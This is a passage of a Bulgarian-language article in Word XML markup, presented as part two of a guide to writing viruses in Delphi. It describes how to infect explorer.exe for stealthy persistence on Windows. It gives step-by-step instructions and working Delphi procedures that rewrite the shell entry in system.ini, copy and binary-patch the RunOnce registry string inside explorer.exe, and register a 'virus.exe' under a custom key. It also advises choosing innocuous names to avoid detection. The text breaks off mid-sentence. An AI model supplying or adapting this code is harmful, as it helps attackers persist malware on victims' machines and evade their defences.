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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Заразяване на explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">В тази статия ще ви обясня нещо, което предполагам интересува всеки от вас. Може би е редно да причисля статията като втората част на ръководството за писане на вируси под Delphi. Първата може да бъде прочетена от адрес: http://www.bulhack.org/docs/virusguide1.htm. В този документ ще наблегна на една подточка от стария, която не бях обяснил там: </w:t>
        <w:br/>
        <w:t xml:space="preserve">... </w:t>
        <w:br/>
        <w:t xml:space="preserve">  - posredstwom zaraziawane na standartnia shell ($winbootdir\system.ini - </w:t>
        <w:br/>
        <w:t xml:space="preserve">    boot - shell), kojto pochti winagi e $winbootdir\Explorer.exe </w:t>
        <w:br/>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Ставаше въпрос за това по какъв начин можем да накараме една програма да се стартира при стартиране на Windows. Наистина вече стана банално всички програми да използува StartUp, win.ini или системния регистър. А и при това всеки го знае и лесно може да хване вируса. Именно поради тази причина в статията ще опиша как можем да заразим explorer.exe, така че той да стартира определена програма при пускане. В случая пак ще използуваме системния регистър, но програмата няма да е записана под ключа Software\Microsoft\Windows\CurrentVersion\Run, а под някакъв произволен ключ. Е добре... веднага изниква въпроса как Windows ще разбере, че трябва да стартира точно програмата стартирана под този ключ? Ами без да променим малко стандартния shell няма как да стане. За начало нека се разберем, че Windows стартира програми от ......\Run и ......\RunOnce. Обаче вторият го използуват много много малко програми и при това записаните в него програми се стартират само след първото рестартиране и за това се налага нашата програма да се записва при всяко стартиране в регистъра на това място. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Нека направим следния опит: </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 1) Копирайте $winbootdir\explorer.exe като explorer2.exe (по-долу ще разберете защо) </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 2) Отворете explorer2.exe с шестнадесетичен редактор </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 3) Намерете стринга RunOnce във файла </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 4) Сега заменете Software\Microsoft\Windows\CurrentVersion\Run с Software\Run като останалите </w:t>
        <w:br/>
        <w:t xml:space="preserve">    позиции замените с 0x00. </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 5) Стартирайте RegEdit </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 6) Направете в HKEY_LOCAL_MACHINE\Software нов ключ с име Run </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 7) В този ключ вмъкнете нов "String Value". Като име пишете Telnet, а като стойност задайте </w:t>
        <w:br/>
        <w:t xml:space="preserve">    c:\windows\telnet.exe (или както ви е $winbootdir) </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 8) Сега ShutDown в MS-DOS mode и пишете: </w:t>
        <w:br/>
        <w:t xml:space="preserve">    cd %winbootdir% </w:t>
        <w:br/>
        <w:t xml:space="preserve">    copy explorer2.exe explorer.exe </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 9) И сега рестартирайте компютъра </w:t>
        <w:br/>
        <w:t xml:space="preserve">10) Когато Windows се стартира...хоп стартира се telnet (разбира се програмата е примерна) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Идеята е ясна. Ще променим explorer.exe, така че той да стартира други стойности от системния регистър при пускане на Windows. Добре. Обаче има един малък проблем. В примера горе записахме explorer.exe като explorer2.exe. Но пробвайте да промените кода на файла explorer.exe ... какво става? Файлът се използува в момента и това не може да стане. Е това е големия проблем. Как да запишем нещо във файл който е заключен? Ами това не може да стане...но за наше щастие можем да четем от файла следователно можем да направим копие като explorer2.exe например, и после да го променим. Идва обаче ред на поредното "но"...как Windows ще разбере, че трябва да стартира explorer2.exe, а не explorer.exe? Ами отговора е, че колегите от Microsoft са помислили и за това. В system.ini е указан файла, който се използува като shell. Ако отворите system.ini на един от първите редове ще видите: </w:t>
        <w:br/>
        <w:t xml:space="preserve">shell=Explorer.exe </w:t>
        <w:br/>
        <w:t xml:space="preserve">Ами значи трябва просто да променим този ред на: </w:t>
        <w:br/>
        <w:t xml:space="preserve">shell=Explorer2.exe  (или нещо по-благозвучно) </w:t>
        <w:br/>
        <w:t xml:space="preserve">Това е всичко, което трябва да прави нашата програма. Нека обаче видим какво трябва да съдържа тя. </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 1) Трябва да презаписва стойността shell в system.ini. За тази цел ще използуваме функцията </w:t>
        <w:br/>
        <w:t xml:space="preserve">    WritePrivateProfileString </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 2) Трябва да копира explorer.exe като explorer2.exe. Това ше го напрваим с CopyFile </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 3) Трябва да намира във файла къде се съдържа .....RunOnce и да го заменя с Software\Run </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 4) Трябва да създава ключ Software\Run (или друг) в регистъра и да вкарва програмата там </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Ето примерни функции с обяснения: </w:t>
        <w:br/>
        <w:t xml:space="preserve">(Не забравяйте, че windows директорията може да не е като тази в примерите. За повече информация за това как да получим win директорията вижте http://www.bulhack.org/docs/virusguide1.htm) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">procedure ChangeSystemINI; </w:t>
        <w:br/>
        <w:t xml:space="preserve">begin </w:t>
        <w:br/>
        <w:t xml:space="preserve">{Pyrwiqt parametyr e sekciqta w INI fajlta, wtoria e kliucha, tretia nowata stojnost, a </w:t>
        <w:br/>
        <w:t xml:space="preserve">chetwyrtiq imeto na INI fajla} </w:t>
        <w:br/>
        <w:t xml:space="preserve">     WritePrivateProfileString('boot','shell','Explorer2.exe','c:\windows\system.ini'); </w:t>
        <w:br/>
        <w:t xml:space="preserve">end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">procedure FileCopy; </w:t>
        <w:br/>
        <w:t xml:space="preserve">begin </w:t>
        <w:br/>
        <w:t xml:space="preserve">     CopyFile('c:\windows\explorer.exe','c:\windows\explorer2.exe',False); </w:t>
        <w:br/>
        <w:t xml:space="preserve">end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">{За по-бърза работа четем целия файл в масив и после ползуваме Pos(..) за да видим на коя </w:t>
        <w:br/>
        <w:t xml:space="preserve">позиция е търсеният стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve">procedure CrackExplorerExe; </w:t>
        <w:br/>
        <w:t xml:space="preserve">const Searched='Software\Microsoft\Windows\CurrentVersion\RunOnce'; {търсената стойност} </w:t>
        <w:br/>
        <w:t xml:space="preserve">      UsedFile='c:\windows\Explorer.exe'; {файла който ще променим} </w:t>
        <w:br/>
        <w:t xml:space="preserve">      Lng1=49;  {дължината на стринга Searched} </w:t>
        <w:br/>
        <w:t xml:space="preserve">      Lng2=12;  {дължината на новия стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve">var f:file; </w:t>
        <w:br/>
        <w:t xml:space="preserve">    fs:longint; {големина на файла} </w:t>
        <w:br/>
        <w:t xml:space="preserve">    i:integer; </w:t>
        <w:br/>
        <w:t xml:space="preserve">    buf:array[1..500000] of char; {буфер където ще заредим файла. може да намалите размера му} </w:t>
        <w:br/>
        <w:t xml:space="preserve">    NewValue:string[Lng2];  {новия стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve">    NewStr:array[1..Lng1] of char;  {обработения нов стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve">     {Под обработка разбираме да запълним оставащите места в тези 49 байта с символ 0x00. </w:t>
        <w:br/>
        <w:t xml:space="preserve">      Това се налага поради факта, че windows използува null-terminated strings т.е. стринго- </w:t>
        <w:br/>
        <w:t xml:space="preserve">      ве без определена големина, а като край на стринга се ползува 0x00} </w:t>
        <w:br/>
        <w:t xml:space="preserve">begin </w:t>
        <w:br/>
        <w:t xml:space="preserve">NewValue:='Software\Run';  {Това е новата стойност} </w:t>
        <w:br/>
        <w:t xml:space="preserve">FillChar(NewStr,Lng1,#0);  {Запълваме обработения стринг с 0x00} </w:t>
        <w:br/>
        <w:t xml:space="preserve">i:=1; </w:t>
        <w:br/>
        <w:t xml:space="preserve">While i&lt;=Lng2 do </w:t>
        <w:br/>
        <w:t xml:space="preserve"> begin </w:t>
        <w:br/>
        <w:t xml:space="preserve"> NewStr[i]:=NewValue[i];   {копираме NewValue върху NewStr} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> Inc(i);                   {сега вече NewStr е "Software\Run&lt;0x00&gt;&lt;0x00&gt;.....&lt;49 байта&gt;} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">AssignFile(f,UsedFile); </w:t>
        <w:br/>
        <w:t xml:space="preserve">Reset(f,1); </w:t>
        <w:br/>
        <w:t xml:space="preserve">fs:=FileSize(f);           {вземаме големината на файла} </w:t>
        <w:br/>
        <w:t xml:space="preserve">BlockRead(f,buf,fs);       {четем целия файл с buf[]} </w:t>
        <w:br/>
        <w:t xml:space="preserve">i:=Pos(Searched,buf)-1;    {намираме позицията на търсения стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve">if i&gt;0 then </w:t>
        <w:br/>
        <w:t xml:space="preserve"> begin </w:t>
        <w:br/>
        <w:t xml:space="preserve"> Seek(f,i);                 {отиваме на намерената позиция...} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> BlockWrite(f,NewStr,Lng1); {...и записваме новия стринг} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> CloseFile(f); </w:t>
        <w:br/>
        <w:t xml:space="preserve"> end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">{В uses сложете и модула Registry} </w:t>
        <w:br/>
        <w:t xml:space="preserve">procedure CreateKeyAndValue; </w:t>
        <w:br/>
        <w:t xml:space="preserve">var reg:TRegistry; </w:t>
        <w:br/>
        <w:t xml:space="preserve">begin </w:t>
        <w:br/>
        <w:t xml:space="preserve">reg:=reg.Create; </w:t>
        <w:br/>
        <w:t xml:space="preserve">with reg do begin </w:t>
        <w:br/>
        <w:t xml:space="preserve"> RootKey:=HKEY_LOCAL_MACHINE;  {Задаваме RootKey} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> CreateKey('Software\Run');    {Създаваме Software\Run} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> OpenKey('Software\Run',False); </w:t>
        <w:br/>
        <w:t xml:space="preserve"> if ValueExists('Virus') = True then exit; </w:t>
        <w:br/>
        <w:t xml:space="preserve"> WriteString('Virus','virus.exe');  {Записваме името на програмата и пътя до нея} </w:t>
        <w:br/>
        <w:t xml:space="preserve">                                    {При писане на вирус трябва да зададете пълен} </w:t>
        <w:br/>
        <w:t xml:space="preserve">                                    {път до директорията на програмата} </w:t>
        <w:br/>
        <w:t xml:space="preserve"> CloseKey; </w:t>
        <w:br/>
        <w:t xml:space="preserve"> end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">reg.Destroy;  {Освобождаваме паметта} </w:t>
        <w:br/>
        <w:t xml:space="preserve">end; </w:t>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">С тези 4 процедури можете да извършите необходимата работа за заразяване на explorer.exe. Разбира се всички използувани имена са примерни. По-добре е да кажем вместо explorer2.exe да ползувате име като wininit.exe и най-вече в регистъра да не пишете virus, а нещо не толкова подозрително. Също добра идея е новия ключ да не е Software\Run, а да кажем Software\Sierra\Programs\Init или нещо подбно (всъщност няма никакво значение). </w:t>
        <w:br/>
        <w:t xml:space="preserve">Отбележете също, че в регистъра има два ключа Run и RunOnce. Ние ползуваме RunOnce и за това ще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2:19:00Z</dcterms:created>
  <dc:creator>*</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>*</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-03-29T12:20:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>Заразяване на explorer</dc:title>
</cp:coreProperties>
</file>